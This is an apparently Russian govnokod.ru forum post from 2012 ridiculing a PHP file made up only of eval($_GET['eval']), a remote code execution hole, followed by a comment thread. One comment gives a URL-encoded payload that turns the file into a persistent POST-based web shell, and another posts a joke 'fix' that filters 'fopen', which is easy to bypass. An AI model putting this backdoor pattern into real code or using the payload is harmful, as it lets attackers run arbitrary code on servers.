- 1
- 2
<?php
eval($_GET['eval']);
Нашли или выдавили из себя код, который нельзя назвать нормальным, на который без улыбки не взглянешь? Не торопитесь его удалять или рефакторить, — запостите его на говнокод.ру, посмеёмся вместе!
+53
<?php
eval($_GET['eval']);
И это весь файл. Epic Fail.
bormand 15.08.2012 11:22 # +2
Vindicar 17.08.2012 08:27 # +1
Vasiliy 15.08.2012 12:21 # +4
WGH 15.08.2012 12:24 # +9
bormand 15.08.2012 15:48 # +4
test.php?eval=%24f%3Dfopen('test.php', 'w')%3Bfwrite(%24f%2C'%3C%3Fphp%20eval(%24_P OST(%22eval%22)%20%3F%3E'%3Bfclose(f)%3B
Vindicar 15.08.2012 16:18 # +4
Resolver 16.08.2012 08:54 # +2
eth0 16.08.2012 12:30 # 0
Resolver 16.08.2012 13:43 # 0
в описании http://httpd.apache.org/docs/2.2/mod/mod_dumpio.html заявлено логирование всего-го.
Вот ещё статья: http://www.cyberciti.biz/faq/apache-mod_dumpio-log-post-data/
Сам не пробовал.
WGH 16.08.2012 13:17 # +3
vistefan 16.08.2012 13:23 # +1
rat4 16.08.2012 13:49 # +1
fixed
bormand 16.08.2012 13:52 # +2
fixed
vistefan 15.08.2012 15:51 # 0
А закрывающего ?> нет?
bormand 15.08.2012 15:55 # +2
vistefan 15.08.2012 16:08 # +1
Помнится у меня была функция, достойная быть выложенной здесь, для парсинга Json-подобного дерьма, используемого исключительно внутри одной системы. Там тоже закрывающие фигурные скобки были необязательны.
roman-kashitsyn 15.08.2012 18:39 # +6
дык вроде это нынче стандарт The closing ?> tag MUST be omitted from files containing only PHP.(c) PSR-3
eth0 15.08.2012 17:12 # 0
Lure Of Chaos 15.08.2012 20:18 # +13
Edward 17.08.2012 18:25 # +3
if(strpos($_GET["eval"], "fopen") !== false)
{
echo "AХТУНГ";
// блокируем нарушителя
while(1){}
}
eval($_GET['eval']);
по мотивам http://govnokod.ru/1168
eth0 17.08.2012 18:38 # +1
Тридцатисекундный бан.
bormand 17.08.2012 18:41 # +2
eth0 17.08.2012 21:03 # +2
Vasiliy 20.08.2012 08:48 # 0